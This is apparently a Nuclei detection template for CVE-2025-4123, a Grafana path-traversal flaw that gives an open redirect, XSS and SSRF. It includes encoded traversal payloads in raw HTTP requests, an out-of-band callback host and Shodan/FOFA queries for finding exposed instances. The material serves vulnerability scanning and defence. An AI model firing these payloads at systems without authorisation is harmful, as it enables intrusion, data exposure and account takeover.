id: CVE-2025-4123

info:
  name: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    An open redirect vulnerability in Grafana can be chained with other issues, such as XSS or SSRF, to increase impact. An attacker may exploit the redirect to target internal services or deliver malicious JavaScript, potentially leading to internal data exposure or account takeover.
  impact: |
    Attackers can exploit path traversal to achieve open redirect, XSS, or SSRF attacks, potentially leading to internal data exposure or account takeover.
  remediation: |
    Upgrade Grafana to the latest version that properly validates and sanitizes file paths in the render endpoint.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 7.6
    cve-id: CVE-2025-4123
    cwe-id: CWE-79,CWE-601
    epss-score: 0.06888
    epss-percentile: 0.91539
  reference:
    - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53
    - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Grafana"
    fofa-query: app="Grafana"
  tags: cve,cve2025,grafana,redirect,unauth,oss,vkev,vuln

http:
  - raw:
      - |
        GET /render/public/..%252f%255C{{interactsh-url}}%252f%253F%252f..%252f.. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: open-redirect
        dsl:
          - status_code == 302 && contains(location, '/\\oast.pro/?/../../')

      - type: dsl
        name: ssrf
        dsl:
          - contains(interactsh_protocol, 'dns') && contains(content_type, 'image/png')
# digest: 4b0a00483046022100a4d033e3c3f79f31d23e236a133f5afe20966a1030d857c6954d2553a5ac9978022100d4f99c7501650c4d98f5bd6776a5781a7574995197a1032740293b33e4ad0d0a:922c64590222798bb761d5b6d8e72950